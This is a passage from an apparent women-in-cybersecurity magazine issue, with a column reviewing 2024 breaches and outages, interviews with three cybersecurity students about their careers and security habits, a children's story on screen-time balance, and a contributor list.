Advanced tools and technologies can scan multiple attack surfaces simultaneously, predict complex threats and prescribe preventive measures. Thus, machine learning will ultimately facilitate a paradigm

shift from reactive to proactive security, making it possible for systems to anticipate threats before they materialise. The future of cybersecurity will not depend upon mere human intervention; it will depend on enhanced intelligent systems that can discern even the most subtle patterns inf attacks.

ETHICAL CONSIDERATIONS AND RISKS

These technologies promise immense benefits in the hands of cybersecurity professionals but are also being embraced by adversaries. Hence, cybersecurity professionals need to surmount the challenges thrown up by the unethical use of these potent tools.

Another problem arises from our increasing dependence on these automatic systems. Although ML can deliver speed, intuition and experience cannot be totally replaced. These technologies are augmentative, they are not substitutes for the skill and judgment of the penetration tester and security professional. Rather, what’s required is finding the right balance whereby automation bolsters security without rendering expertise irrelevant.

A BALANCED VIEW OF THINGS AHEAD

You will see the progress: from OpenVAS to AI phishing detection systems, foreshadowing a future in which cybersecurity will become much more effective, adaptive and available. The industry keeps changing. Embedding ML into vulnerability scanning tools is bound to make the digital world safe for one and all; from the pros to commoners.

www.linkedin.com/in/florence-kabona-a6b54b171/

KAREN

STEPHENS

Karen Stephens is the co-founder and CEO of BCyber. After more than 25 years in financial services, Karen moved into SME cybersecurity risk management. She works with SMEs to protect and grow their businesses by demystifying the technical aspects of cybersecurity and helping them to identify and address cybersecurity and governance risk gaps. She was recently named inaugural Female Cyber Leader of the Year at the 2023 CyberSecurity Connect Awards in Canberra.

COLUMN

Reflecting on 2024: the year that changed everything for us

Welcome to the tail end of 2024! My oh my, hasn’t it been a big year?

We kicked off the year with the ‘Mother Of All Breaches’. Then our new financial year celebrations were rudely interrupted by the ‘CrowdStrike Outage’ (thanks guys), and just when we thought the year couldn’t get any busier our favourite regulators, ASIC and APRA, released their 2025 corporate plans (no prizes for guessing what’s on my reading list). Then, we rounded out the year with the federal government making some interesting choices with respect to social media access (in the interests of full disclosure, I’d like to give a shout out to my favourite sub 16 year old child).

But, as I always say, don’t let a good cyber incident go to waste. It’s cheaper to learn from the misfortunes of others than it is to ‘go it alone’ and have your very own cyber incident. So, let’s have a quick look at lessons we can learn from 2024.

THE MOTHER OF ALL BREACHES (MOAB).

This super breach saw some 26 billion records equating to 12 terabytes of leaked data from a variety of sources exposed. The key word here is ‘variety’. This was one of the first cyber incidents of its size and type. You had a malicious actor (aka cybercriminal) who pulled together data from multiple sources (old breaches, leaks etc, some published and some not) and combined them into nice, neat ready for sale ‘information packs’. So, if you haven’t updated your passwords this year for—well pretty much everything—now is the time!

PPPPP

Or, as my old manager used to say: Prior Preparation Prevents Poor Performance. Our teacher here is the Medibank incident of 2022. Their cyber incident and clean-up costs are set to reach $A126m by 2025. So, if you don’t have a lazy couple of million in the bank to cover the cost of a cyber breach, end your year with an independent cyber assessment so you know what you actually have in place rather than what you think is in place. Make sure the assessment incorporates technology and operational areas, identifies your gaps and put in place a program to address them.

ATTENTION TO DETAIL

Cybersecurity isn’t just a tech issue. (This is the hill I am prepared to die on!) I cannot say this often enough; and this year we have lived through two amazing examples of cybersecurity issues where the human element was the source. The CrowdStrike Outage affected less than one percent of Windows machines globally, but resulted in significant global mayhem. It was caused by a bug in an update. I wonder how that bug got through user acceptance testing (UAT). And, thanks to , we now understand first-hand how important it is to ensure our backups are checked and checked again. An ‘inadvertent misconfiguration’ during the provisioning of UniSuper’s cloud services triggered an ‘auto-kill’ and saw the wiping of UniSuper’s entire Google Cloud (including all its backups stored on the service). With over 615,000 members and $A124b in funds under management as of 30 June 2023, the disruption of UniSuper’s online member services was not a good look. Both incidents could have been avoided with a little more attention to detail.

SOCIAL MEDIA AND CHILDREN

Well, this is a bit of a moveable feast at the moment and, unfortunately, I don’t have a ‘magic bullet’. But what I do know is this: the fact this topic is being discussed (and debated) is a good thing. My column from earlier this year Are you ever too young to start your cyber safety journey? doesn’t have all the answers, but it does have a few handy hints to help you start your child’s cyber safe journey.

May you and yours have a cyber-safe festive season with 2025 bringing only peace, joy and happiness.

www.linkedin.com/in/karen-stephens-bcyber

www.bcyber.com.au x.com/bcyber2

karen@bcyber.com.au youtube.bcyber.com.au/2mux

STUDENT IN SECURITY SPOTLIGHT

Lunyolo Evelyn Kirabo, a final-year student at Makerere University, pursuing a degree in Information Systems and Technology with a special focus on cybersecurity and DevSecOps. With a passion for integrating development, security, and operations.

Information Systems and Technology student at Makerere University

In a casual conversation with someone unfamiliar with the field, how do you articulate the excitement and potential of a career in cybersecurity, aiming to spark their interest?

Cybersecurity is such an exciting and ever-changing field. What really draws me in is the challenge of staying one step ahead of cybercriminals and knowing that I’m making a real difference by securing systems and protecting sensitive data. It’s not just about stopping attacks; it’s about being proactive— building security into the development process from the start and designing systems that are resilient by nature. Whether it’s ethical hacking, securing cloud environments, or using DevSecOps to automate security in development, there’s always something new to learn and explore. The possibilities for growth and innovation are endless, and that’s what keeps me so passionate about it.

Reflecting on your initial perceptions of cybersecurity when you first considered studying it, how does the reality of your experiences today compare?

When I first thought about studying cybersecurity, I imagined it was all about reacting to breaches or setting up firewalls. But as I’ve dug deeper into the

field, I’ve discovered it’s so much more than that. It’s about truly understanding how systems work and finding vulnerabilities before they can be exploited. The rise of DevSecOps has been a game-changer for me, showing how security is woven into every stage of software development, from coding to deployment. The reality is way broader and more complex than I first thought, and it’s only made me more excited to pursue this career.

Upon graduation, which specific cybersecurity role do you aspire to secure employment in, and what motivates your choice?

I’m really excited about the idea of becoming a DevSecOps engineer. This role stands out to me because it’s where security and software development come together. I’m passionate about the concept of weaving security into every stage of the development process. With cyber threats becoming more frequent and sophisticated, I believe secure coding and automated security checks are more important than ever—and I want to be part of that change. It’s the perfect role for me, combining my skills with my drive to build secure systems from the ground up.

When you decided to pursue a career in cybersecurity, how did your parents, peers, or career advisors react? Did you encounter any opposition, and if so, how did you navigate those challenges?

When I decided to pursue cybersecurity, my parents were supportive, though at first, they weren’t quite sure about the field since it was new to them. I took the time to explain how in-demand cybersecurity professionals are and why the field is so important in today’s digital world, and that helped them understand my decision. I did face some challenges along the way, especially from peers who questioned whether a woman could succeed in such a techdriven industry. But instead of letting it hold me back, I used those doubts as motivation to prove myself.

LUNYOLO EVELYN KIRABO

I was also lucky to have a mentor, Chinenye Chizea, who has been a huge support, always encouraging me to keep pushing forward.

Who or what has been the most influential factor in shaping your journey in cybersecurity so far, and how has it impacted your career aspirations?

The two biggest influences in my journey have been Chinenye Chizea, my mentor from the CyberGirls Fellowship, and my boyfriend, Samson Nathan Wanendeya. Chinenye, as a successful woman in tech, has been a source of invaluable guidance, especially when it comes to navigating the challenges of being a woman in a male-dominated industry. Her mentorship has not only boosted my confidence but has also shaped my career goals, particularly in aiming for leadership roles in DevSecOps. Watching her succeed has shown me that with hard work and the right support, I can thrive in cybersecurity.

Samson has also played a huge role in my growth. He’s been my constant motivator, always pushing me to do better and learn more. He regularly shares resources that align with my interests, mentors me for personal development, and encouraged me to apply for study opportunities. He even helped me record the video that got me into the CyberGirls Fellowship, which took us an entire day to perfect!

From teaching me Python, Java, JavaScript, HTML, and CSS to constantly encouraging me to break through stereotypes like “women don’t code,” he’s been an unwavering source of support and motivation.

Recount the most memorable or significant event in your cybersecurity journey to date, highlighting why it left a lasting impression. The most memorable moment in my cybersecurity journey has definitely been participating in the CyberGirls Fellowship. It was an incredible experience, bringing together a group of passionate

women all eager to learn and support each other in the cybersecurity field. Not only did the fellowship give me valuable technical training, but it also helped me grow personally. Being surrounded by like-minded women who shared the same drive and enthusiasm really stuck with me. It reinforced just how important community, mentorship, and lifting each other up as women in tech truly are.

Beyond your academic studies, what practical experience have you gained in the field of cybersecurity through employment or internships?

Throughout my studies, I’ve actively looked for internships and hands-on projects where I could apply what I’ve learned in the classroom. These experiences have been invaluable in giving me real-world exposure to the security challenges that organisations face and have helped me build practical skills. Working in a DevSecOps environment has been especially exciting, as it’s taught me how to seamlessly integrate security into the development process, which is an area I’m really passionate about.

I’ve also had the chance to participate in the CyberGirls Fellowship, the ALX AI Essentials course, and the Arewa Data Science Fellowship. Right now, I’m working on improving my front-end programming skills, with a little help from my significant other, who’s a front-end developer. He’s been a great support in guiding me through the learning process!

The cybersecurity industry offers various certifications from different organisations. Have you pursued, or do you plan to pursue any of these certifications? If so, which ones, and what factors influenced your choice?

Yes, I’m currently studying for the CCNA certification because I think understanding networking fundamentals is crucial for cybersecurity. It’s such a key area, and the CCNA will give me a solid foundation. On top of that, I’m planning to take the Certified DevSecOps Professional (CDP) exam this December. Since I’m aiming to become a DevSecOps engineer, the CDP certification aligns perfectly with my goals. It will help me develop the skills I need to seamlessly integrate security into the development process. Both certifications are well-recognised in the industry, and I’m excited to use them as tools to help me succeed in my future career.

Given the rapid evolution of cybersecurity threats, do you feel that your academic program adequately keeps pace with the industry’s current landscape?

While my academic program has definitely given me a strong foundation in cybersecurity, I feel like there’s a need for more hands-on, real-world training. Cybersecurity is such a fast-paced field, and with the rise of cloud computing, DevSecOps, and automated security tools, I think academic programs need to update their curricula more often to keep up. I’d love to see more practical labs, real-life case studies, and exposure to the tools used in the industry. I think this would help students like me be better prepared to face the ever-evolving cyber threats out there.

What aspect of your cybersecurity studies excites you the most, and why?

What excites me the most is diving into DevSecOps, especially the idea of weaving security into every step of the software development process. As someone aiming to become a DevSecOps engineer, I’m really eager to learn more about automating security, managing secure development pipelines, and making sure that security is a priority right from the start. This holistic approach to security is not just a trend— it’s crucial in today’s fast-paced development world, where addressing vulnerabilities early on can make all the difference.

Conversely, which aspect of your studies do you find least interesting or useful, and how do you navigate through it?

Some of the more theoretical parts of cybersecurity, like cryptography and network protocols, can definitely be challenging. But I’ve come to appreciate how important they are, so I break them down into smaller chunks to make them more manageable. To help with this, I use online resources and practical examples, which make it easier to see how these concepts apply in the real world. It’s all about finding ways to connect the theory to something I can actually work with!

LUNYOLO EVELYN KIRABO

Are there specific aspects of your cybersecurity studies that you find particularly challenging? If so, what are they, and how do you approach overcoming these challenges?

One of the toughest parts of my studies has been getting a solid grip on advanced cryptographic algorithms and how they’re applied in the real world. To make it easier, I break down the theory behind each algorithm and try experimenting with practical examples. I also lean on online resources and have great discussions with my professors and classmates to really solidify my understanding. It’s a process, but it’s been rewarding as I start to see how it all fits together.

Do you believe there are areas in cybersecurity that deserve more emphasis in your coursework or areas that could receive less focus?

I think my coursework could really benefit from more focus on cloud security and DevSecOps. As more organisations shift their infrastructure to the cloud and automate their development pipelines, these areas are becoming increasingly important. While foundational topics like network security are crucial, I feel these emerging fields need more attention to help students like me get ready for the challenges ahead. It’s all about making sure we’re equipped for the future of cybersecurity.

Considering the holistic requirements of a future role, do you see the need for additional training in non-cyber skills, such as interpersonal communication or management? If yes, why?

Definitely! While technical skills are super important in cybersecurity, I’ve realised that communication and management skills are just as crucial. In roles like DevSecOps, it’s essential to be able to explain security issues to non-technical people and work well with different teams. As I move forward in my career, I know that leadership and project management skills

will also be key as I take on more responsibility and lead projects. It’s all about balancing the technical with the practical side of things.

Are you actively engaged in the broader cybersecurity community? If so, what has been your involvement, and how has it enriched your experience?

Yes, I’m actively involved in a few online cybersecurity communities and local meetups. Being part of forums, attending conferences, and connecting with other students and professionals has been a great way for me to stay on top of industry trends, exchange knowledge, and meet people with similar interests. It’s also given me the opportunity to learn from others and apply what I’ve learned in real-world situations, which has been super valuable in my growth.

What is your preferred source for staying informed about cybersecurity trends and general information?

I stay updated by following a few key online platforms, like Reddit’s r/cybersecurity forum, and reading blogs such as KrebsOnSecurity and Dark Reading. I also subscribe to newsletters from organisations like ISC2, EC-Council, Cisco, and SANS, which give me a lot of useful insights on emerging threats and best practices. On top of that, I enjoy listening to podcasts like CyberWire Daily and Darknet Diaries to keep up with the latest happenings in the cybersecurity world. It’s all about staying informed and constantly learning!

Have you ever encountered situations where being a woman in cybersecurity made you feel disadvantaged or discriminated against? If so, please share your experiences.

Luckily, I haven’t experienced outright discrimination, but there have definitely been times when my technical abilities were questioned just because I’m a woman. Those moments were tough, but instead

of letting them get me down, I saw them as chances to prove myself. Having a solid support network of mentors and other women in tech has really helped me push through these challenges and keep moving forward. It’s all about finding strength in those who lift you up.

What measures do you have in place to enhance your personal cybersecurity in today’s digital landscape?

I make sure to use strong, unique passwords for each of my accounts and rely on a password manager to keep them all organised. I also turn on two-factor authentication (2FA) for my important accounts and stay on top of software updates. To keep my browsing secure, I always use a VPN, and I back up my data regularly to protect against ransomware. Staying proactive with these steps

gives me peace of mind knowing I’m doing my best to stay safe online.

Reflecting on your journey thus far, would you, with the benefit of hindsight, make any changes to your career trajectory? If yes, what adjustments would you consider?

Looking back, I wish I had started gaining more hands-on experience earlier, particularly in areas like DevSecOps and cloud security. Getting practical experience in these fields would have really helped me strengthen my skills and better understand how the concepts I’m learning are applied in the real world. I’ve definitely learned the value of getting hands-on sooner rather than later!

Have you actively sought employment opportunities in the cybersecurity field, and if so, what has been your experience with the application and interview process?

I’ve been applying for internships and entry-level roles in cybersecurity, and while the process has had its challenges, it’s also been incredibly rewarding. Preparing for interviews has really pushed me to sharpen my technical knowledge, and I’ve learned how important it is to tailor my resume to highlight the skills that matter most. Every application and interview is a chance to grow and get one step closer to my career goals.

Looking ahead, I’m really excited about the opportunities in DevSecOps and cybersecurity as I approach graduation. With my CCNA studies in progress and the Certified DevSecOps Professional (CDP) exam coming up in December, I feel confident that I’m on the right path. I’m eager to find a role where I can contribute meaningfully to the cybersecurity field and continue learning and growing.

www.linkedin.com/in/evelyn-kirabo-lunyolo-a43881270

In a casual conversation with someone unfamiliar with the field, how do you articulate the excitement and potential of a career in cybersecurity, aiming to spark their interest?

As a Gen-Z hacker who’s had the chance to discuss cybersecurity with over 200 people, from young kids to government CISOs, I’ve realised that pop culture plays a huge role in getting people excited about the topic.

The way movies and TV shows portray “hacking a bank” or pulling off some epic cyber-heist definitely sparks interest in students. Of course, I always make sure to emphasize the importance of ethical practices.

I like to kick things off with something simple and relatable, like, “I have a life on my phone.” It’s a conversation starter that helps people understand how much personal data they carry around daily. Then, I guide them into realising just how vulnerable that “life” can be, and what steps they can take to protect it.

When I introduce teenagers to cybersecurity, I usually focus on IoT security (especially pentesting) and OSINT. These topics hit home because they feel tangible and real, not abstract concepts.

I find that telling a student how their favorite coffee machine can be hacked or how a photo on Instagram can reveal the location of their celebrity crush’s house brings cybersecurity down to earth. It shows them that the real-world application of cybersecurity is just as cool – if not cooler – than what we see in movies.

Reflecting on your initial perceptions of cybersecurity when you first considered studying it, how does the reality of your experiences today compare?

What first sparked my interest in cybersecurity was actually pop culture. There’s a Netflix series called Salvation where the female leader of a hacker group saves the world by hacking, and I really connected with her. At that moment, I thought, “That’s me!” But, I quickly realised that cybersecurity is often misunderstood by the media.

Even though I had a strong background in competitive programming, I used to think hacking was too technical for me. I felt like I didn’t fit the stereotypical image of a “tomboy hacker in a hoodie,” and honestly, I thought I was “too dumb” or “too girly” to be a part of that world. When I started studying for an industry exam like the (ISC)² CC at just 14 years old, I hadn’t even finished middle school yet. The study materials felt like they were written in a foreign language, so complicated that it almost discouraged me. But I knew that modern problems needed modern solutions.

So, I started creating my own analogies to break down these complex concepts—like using Charlie and the Chocolate Factory to explain the OSI model. It made things so much easier to grasp. Even now, when I’m learning or teaching, I rely on these creative analogies to relate technical terms to everyday scenarios or fictional worlds. And honestly, who wouldn’t enjoy using a Christmas party to explain security principles?

BANDANA KAUR

Bandana Kaur, a dedicated and motivated student currently in the 12th grade at High School in Delhi, India.

High school student in India

Upon graduation, which specific cybersecurity role do you aspire to secure employment in, and what motivates your choice?

Passion and principles have always been at the core of my decisions, and that’s certainly true when it comes to my career path. For me, a strong offense is the best defense—especially when it comes to tackling the next generation of cyberthreats. I’ve chosen offensive security engineering as my future career because I’m driven—not just to learn, but to contribute to something bigger than myself. I want to play a part in keeping the digital world safe, ensuring it stays secure for the generations that follow. The idea of making a real difference motivates me, and offensive security engineering is where my skills and passion align the most.

When you decided to pursue a career in cybersecurity, how did your parents, peers, or career advisors react? Did you encounter any opposition, and if so, how did you navigate those challenges?

When I first decided to pursue a career in cybersecurity, my parents had no idea I was even interested in it. It wasn’t until two years later, when I

was featured on my first podcast episode on Talent First - The Podcast, that they realised what I was up to. While they never actively opposed my choice, navigating this path on my own was tough. With only a middle school background and no mentors or peers to guide me, I often felt lost and overwhelmed. But my passion—and the support of my parents—kept me moving forward.

The challenges didn’t stop there, but I’ve learned that sometimes, obstacles are just opportunities in disguise. My journey hasn’t been traditional, but the fulfillment I get from pursuing my passion and making a real impact in cybersecurity makes every bit of it worth it.

Beyond your academic studies, what practical experience have you gained in the field of cybersecurity through employment or internships?

As a high school senior, one of my proudest professional moments was participating in Microsoft’s Future Ready Talent Internship Program, where I got to dive deep into AI and Security using Azure. For my final project, I built a network monitoring tool that gave me hands-on experience with real-world problem-solving and helped me understand the complexities of network security. The tool I developed allows for virtual network creation, real-time monitoring with network watchers, packet capture for traffic analysis, and much more. It was an amazing opportunity, and I’m excited for more experiences like this once I finish high school!

What aspect of your cybersecurity studies excites you the most, and why?

What excites me most about studying cybersecurity is the chance to make a real impact through Vulnerability Disclosure Programs (VDPs). Being able to ‘hack’ real-world systems and apply what I’ve learned in a hands-on way gives me an adrenaline rush, especially when I’m reporting security flaws

that could be exploited by bad actors—kind of like a Batwoman moment. Through these programs, I’ve had the opportunity to help secure organisations like NASA, the US Department of Education, and the Indian Government. What’s even better is that participating in responsible disclosure programs helps connect the dots between what I learn in theory and how it actually makes a difference in the real world.

Are you actively engaged in the broader cybersecurity community? If so, what has been your involvement, and how has it enriched your experience?

I’ve built an amazing and supportive community with over 30K followers on Instagram and nearly 9K on LinkedIn, where we dive into everything from the latest trends in cybersecurity and AI to taking on OSINT challenges together. On top of that, I’ve been a Cybersecurity Career Ambassador for the US National Initiative for Cybersecurity Education (NICE) by NIST for about a year, where I’m most actively involved. This community has been crucial to my growth, helping me connect with mentors who continue to inspire and guide me.

As a way to give back, I organised a free, gamified event during Cybersecurity Career Week in October, designed to introduce Gen-Z to the field. The event, which was full of fun, interactive DFIR activities, was themed around Among Us to keep it engaging and spark interest in cybersecurity in a way that felt accessible and exciting.

Have you ever encountered situations where being a woman in cybersecurity made you feel disadvantaged or discriminated against? If so, please share your experiences.

While I haven’t faced direct discrimination, I’ve definitely felt the weight of being underestimated simply because I’m a young woman. There have been times when I felt like I had to prove myself more than my male peers. But instead of holding me back, those challenges pushed me to work even harder.

Starting my personal brand, HackWitHer, was my way of tackling the “dream gap” that often holds young people—especially women—back from pursuing STEM careers. Passion and intelligence aren’t defined by gender, and I hope to be a part of breaking down stereotypes and showing others that they can follow their passions without limits.

www.linkedin.com/in/hackwither

www.instagram.com/hackwither

BANDANA KAUR

Sophia Aspera, a passionate second-year student pursuing a Bachelor of Information Technology with a major in Cybersecurity at Macquarie University

Bachelor of Information Technology student at Macquarie University

Reflecting on your initial perceptions of cybersecurity when you first considered studying it, how does the reality of your experiences today compare?

I chose cybersecurity because it really stood out to me compared to other IT fields. When people think of cybersecurity, they usually imagine a hooded hacker trying to steal your data, but for me, it’s always been more like a puzzle or a game. I’ve always loved games and solving problems, so the idea of a catand-mouse chase with an adversary really grabbed my attention.

As I’ve learned more about the field, I’ve realised that cybersecurity isn’t just about technical stuff or red team versus blue team scenarios. It’s just as much about people and the physical environments as it is about computers. In fact, the human element is huge—everyone in an organisation needs to follow security policies for the system to stay safe, whether they’re defending or unintentionally creating vulnerabilities. It’s also more creative than I originally thought. Hackers are always looking for new ways to exploit weaknesses, so thinking outside the box and being open-minded are key skills to have in this field.

What I love most is how fast the field evolves—it keeps you on your toes and makes every day a new challenge.

When you decided to pursue a career in cybersecurity, how did your parents, peers, or career advisors react? Did you encounter any opposition, and if so, how did you navigate those challenges?

My parents and peers have always been incredibly supportive, but I think a lot of the challenges I faced came from my own perception of the field and a feeling of imposter syndrome. I went to an all-girls high school with a small but passionate computing class, and I didn’t have many female role models in tech to turn to for advice. The lack of other girls pursuing IT or cybersecurity was a bit discouraging at first, especially because it felt like stepping into a male-dominated world.

But things really changed toward the end of high school when I joined a programming workshop run by women in IT for high school girls called the Girls Programming Network (GPN). The session I attended focused on hashing passwords, and at the end of the day, we had a mentor hangout where we could talk to women working or studying in IT about their experiences. Hearing their stories and realising that the field wasn’t as intimidating as I had thought made me feel much more confident about pursuing IT studies. The cybersecurity content of the workshop was also super interesting and motivated me even more to dive deeper into the field.

Now, I volunteer with GPN to help encourage other high school girls to explore coding and hopefully show them how fun and rewarding IT can be!

Who or what has been the most influential factor in shaping your journey in cybersecurity so far, and how has it impacted your career aspirations?

Honestly, it’s my peers and lecturers who really inspire me to push myself and get more involved in the field. Being around people who are passionate about what they’re learning and teaching is incredibly

SOPHIA ASPERA

motivating—their enthusiasm is contagious! It’s made me want to dive deeper into cybersecurity beyond just the classroom.

One of the clubs I’m currently part of is the MQ Hack Hub, which started this year. It’s a great space for people at all skill levels to learn more about Capture The Flag (CTF) challenges, specifically the jeopardytype ones. These challenges are all about solving computer security-related questions under pressure, and they cover everything from binary exploitation to open-source intelligence (OSINT). The practice I’ve gotten in the club and the support from my peers really gave me the confidence to join my first CTF competition.

Being surrounded by such a diverse group of people has also opened my eyes to the many different paths in cybersecurity, from penetration testing to governance, risk management, and compliance. I’m excited to explore all these areas and figure out what excites me the most!

Recount the most memorable or significant event in your cybersecurity journey to date, highlighting why it left a lasting impression. One of my most memorable experiences so far was joining my first jeopardy-type CTF competition and winning first place with my team. It was definitely a challenge, and I had to really step out of my comfort zone. But it was such a rewarding experience, not only for the win but for all the learning that happened along the way. I got to dive into different areas of computer security, like cryptography and reverse engineering, and it was exciting to see how much my skills developed throughout the competition.

The competition lasted for four weeks, run by SECedu, and every week we were given new challenges to solve faster than other teams. I was part of an amazing team of talented individuals, and working with them for a month straight was

an incredible learning experience. It taught me not only technical security skills but also the value of perseverance and teamwork.

One of the highlights for me was the cryptography challenge. We spent hours working through it and hitting dead ends, and when we finally cracked the cipher and found the flag, it felt like a huge accomplishment. We kept working hard every week, and there was a moment when the point gap between teams got really tight. Seeing my team hold onto first place at the end of the competition was so rewarding, and I’ll definitely never forget that feeling.

What aspect of your cybersecurity studies excites you the most, and why?

I’m really excited to dive deeper into the governance side of cybersecurity. While my studies so far have given me a solid foundation in IT — like programming and networking — I’m eager to explore how governance, risk management, and compliance tie cybersecurity to business goals. It’s fascinating to shift away from just the technical side and learn how policies and regulations are built around the vulnerabilities we find in the systems we work with. As the digital landscape is always changing,

SOPHIA ASPERA

I’m looking forward to learning how we can adapt existing frameworks to keep up with those shifts and ensure companies remain secure while meeting regulatory requirements.

Are there specific aspects of your cybersecurity studies that you find particularly challenging? If so, what are they, and how do you approach overcoming these challenges?

I’ve found that classes heavy on concepts, like applied cryptography, can be tough to get through, especially when there’s so much information to absorb. While I really want to deepen my understanding of these topics, it can sometimes feel overwhelming. To help manage this, I’ve started forming study groups with friends who are taking the same courses. Explaining concepts to each other in simpler terms has made it easier to digest the material. My university also offers support services like the Computing Drop-In Centre, where we can get help with specific content or problems we’re struggling with. Having a supportive community and access to resources has definitely helped me break down complex material into more manageable pieces.

Considering the holistic requirements of a future role, do you see the need for additional training in non-cyber skills, such as interpersonal communication or management? If yes, why?

Absolutely! I believe developing non-technical skills is just as important as the technical ones, especially when it comes to becoming a well-rounded professional. The technical knowledge we gain in school is essential, but if you can’t communicate your ideas clearly and appropriately, it can be a real disadvantage. In cybersecurity, you often have to collaborate with others, whether it’s your team, nontechnical colleagues, or even clients. Knowing how to explain complex concepts in a way that makes sense to your audience, and working together to leverage

everyone’s strengths, are crucial skills. These soft skills aren’t always explicitly taught in our programs, but I think focusing on them will help us adapt and succeed in any role we take on in the future.

What measures do you have in place to enhance your personal cybersecurity in today’s digital landscape?

I always encourage my friends and family to avoid reusing passwords, and I make sure to follow this rule myself. I try to use long, unique passwords that don’t include common words and mix in numbers, symbols, and different characters. Another important step I take is enabling multifactor authentication (MFA) for all my accounts – it’s an extra layer of protection that really helps safeguard my information.

There are a few other habits that I think are basic but still super important. For example, I always change the default passwords on new devices as soon as I get them, like for routers or smart home gadgets. I also avoid accessing sensitive sites—like banking or health apps—while using public Wi-Fi. It’s become even more crucial with remote work becoming the norm, especially since the pandemic.

Lastly, I’m very cautious about how much personal information I put online. Growing up, my parents always warned me about “stranger danger,” but it wasn’t until I got into OSINT challenges through CTFs that I realised just how much personal info can be dug up from even a single public profile. So, I’ve made a habit of keeping my social media accounts private and removing sensitive details like my school name or birthdate from my bios. It’s all about protecting your privacy!

www.linkedin.com/in/sophia-a-90a284304

LISA ROTHFIELD-KIRSCHNER

Director at Private Wealth Network | Impactful Education & Peer Experiences for Family Office

Olivia and Jack navigate screen time limits

Twins Olivia and Jack loved exploring the world around them and were fascinated by the magical world of the internet. They enjoyed playing games, watching videos and chatting with their friends online.

Olivia and Jack’s parents often cautioned them not to spend too much time online and to make sure they had a balance between screen time and other activities. However, Olivia and Jack had been home from school for a few weeks recently with a nasty virus and had been glued to their screens. They had made a full recovery, but were finding it hard to get back to normal, and their parents were worried they were missing out on other important activities like playing outside, reading books and spending time with friends and family.

Sunday evenings were always family dinner evenings and one Sunday their parents said: “We need to talk about your screen time. We love that you’re excited about learning and having fun online, but it’s important to have a balance.”

Olivia, often quick to get upset, said: “But we love playing our games and watching our favourite shows!” Jack added, “We use our screens to connect with our friends, and EVERYONE ELSE is on their screens socialising!”

Their parents sighed and explained to them: “In our house we have guidelines, and we need to get back to using them to make sure we have a healthy relationship with technology and our devices. We don’t want you getting addicted!

“We know you use technology to learn about the world, and we are impressed by how much knowledge you have accumulated, Olivia. We also know you use #cyberchat to stay connected to your friends, Jack. But if we don’t limit your screen time then this can lead to problems.”

“Like what?” Jack asked.

“Well,” their parents explained, “spending too much time on screens can make it harder to focus on schoolwork, and it can affect your sleep. Plus, you might miss out on other fun activities like playing sports, reading and just hanging out in real life with your friends and family.”

Olivia and Jack thought about this. They loved their screen time, but they also enjoyed playing basketball, riding their bikes, reading and beating their opponents at chess.

“So, what should we do?” asked Olivia.

Their parents said, “Let’s set some limits to help you have a healthy balance. How about we have screen time for half an hour after school and a little more on weekends? The rest of the time, you can spend either outside at the park shooting hoops, riding your bikes around the track, and with your friends in real life. You can use devices for your homework as you need to, but don’t cheat because we will be monitoring you!”

Jack was unsure, but eventually said, “OK, that sounds fair. We can still play our games and chat with our friends on #cyberchat, but we’ll have more of a balance for other activities.”

Over the next few weeks Olivia and Jack got back to their normal ways and soon forgot they had been constantly glued to their screens. Olivia still spent time ‘cyber tubing’ about her favourite topics, and Jack still had time to chat with his friends on #cyberchat and play #cybernite, but they also spent time catching up on the books they had borrowed from the library and hanging out with their friends and family.

The next Sunday at family dinner, Olivia announced: “I’m feeling much happier having more balance in my online vs offline time.” Jack said “I agree with you. I missed spending more time outdoors.”

And so, Olivia and Jack learnt the importance of balancing their screen time with other activities. They realised being online and on their devices was enjoyable, but there was also a whole world of adventures waiting for them offline, and having a balance between these and screen time was best.

In the next issue we will learn about the importance of security platforms

www.linkedin.com/in/lisarothfield-kirschner

howwegotcybersmart.com

How We Got Cyber Smart addresses cyber safety, cyber bullying and online safety for elementary school-aged children.

Lisa has partnered with Cool.Org , and her content is found on the Department of Education website .

WOMEN IN SECURITY MAGAZINE

1. AMANDA-JANE TURNER

Author of the Demystifying Cybercrime series and Women in Tech books. Conference Speaker and Cybercrime specialist

2. JAHNAVI GURRAPPADIA

Cyber Security Test Analyst at Insurance Australia Group (IAG)

3. FAVOUR UGWOKE

SOC Analyst at SHELT Global Ltd

4. NIKKI ROBINSON

STSM and Senior Manager, IBM / Adjunct Faculty, UMGC at Maryland

5. DOROTA KOZLOWSKA

Penetration Testing and Social Engineering Specialist | Security Analyst at Black Hills Information Security

6. RAMONA RATIU

MS, CISM, CISA, GCCC, GSTRTCyber Security | Adjunct Professor | Board Strategic Advisor | Mentor | SheLeadsTech Ambassador

7. ESTHER ROBERTS

Cybersecurity Analyst and Penetration Tester at Port Harcourt

8. LIHANSA MINRADIE JAYASINGHE

Associate Engineer - Information Security at CryptoGen

9. STACIA MASON

GRC Analyst at Acrisure

10. CRAIG FORD

11. MARCUS LAVALLE-SMITH

Principal Consultant at Decipher Bureau (Cyber Security Recruitment). Harry Potter fan.

12. JO STEWART-RATTRAY

Oceania Ambassador, ISACA

13. LISA VENTURA

Founder, Cyber Security Unity

14. SIMON CARABETTA

Manager Cyber SecOps and Incident Response at East Metropolitan Health Service

15. MARY KAMBO

Cybersecurity Engineer and Consultant

16. REBBECA ROBERTS

Regional Sales Manager - Australia & New Zealand at Exabeam

17. ERIN GRIPPO

Senior Manager, Product Operations at Brivo

18. REYHAN USMAN

EOC Information Technology/Administrative Coordinator at eHealth Africa

19. PAMEELA GEORGE

Customer Service Assistant - Carrolls Irish Gifts

20. ANITA NNAMDI

SOC Analyst

21. MARISE ALPHONSO

Information Security Professional

22. FLORENCE KABONA

Penetration tester

23. KAREN STEPHENS

CEO and co-founder of BCyber

24. LUNYOLO EVELYN KIRABO

Information Systems and Technology student at Makerere University

25. BANDANA KAUR

High school student in India

26. SOPHIA ASPERA

Bachelor of Information Technology student at Macquarie University

27. LISA ROTHFIELD-KIRSCHNER

Author of How We Got Cyber Smart | Amazon Bestseller

THE LEARNING HUB

INTRODUCTION TO INFORMATION TECHNOLOGY

The course provides students with an overview of IT systems (including software and hardware) as well as database management, networking, ethics, privacy, and security.

VISIT HERE

CS50’S INTRODUCTION TO COMPUTER SCIENCE

The on-campus version of CS50 is Harvard’s largest and most popular course, and this free online version is the same one taught in the classroom. It’s comprehensive, covering programming languages, algorithms, data structures, resource management, web development, security, and more. Anyone who wants to learn internet technology basics at no cost from one of the nation’s top Ivy League schools would do well to enroll.

VISIT HERE

TECHNOLOGY COURSES

